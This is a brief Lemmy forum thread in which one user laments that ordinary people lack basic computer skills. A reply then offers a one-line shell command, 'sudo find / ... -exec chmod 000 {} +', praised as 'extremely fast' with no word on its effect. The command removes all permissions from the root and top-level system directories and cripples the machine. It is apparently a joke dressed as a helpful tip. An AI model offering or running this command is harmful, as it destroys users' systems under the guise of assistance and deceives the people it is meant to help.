I feel like the people I interact with irl don’t even know how to boot from a USB. People here probably know how to do some form of coding or at least navigate a directory through the command line. Stg I would bet money on the average person not even being able to create a Lemmy account without assistance.

    • lars@lemmy.sdf.org
      link
      fedilink
      arrow-up
      2
      ·
      10 hours ago

      You don’t even need to do it recursively:

      sudo find / -path '/*/*' -prune -o -exec chmod 000 {} +
      

      This is extremely fast.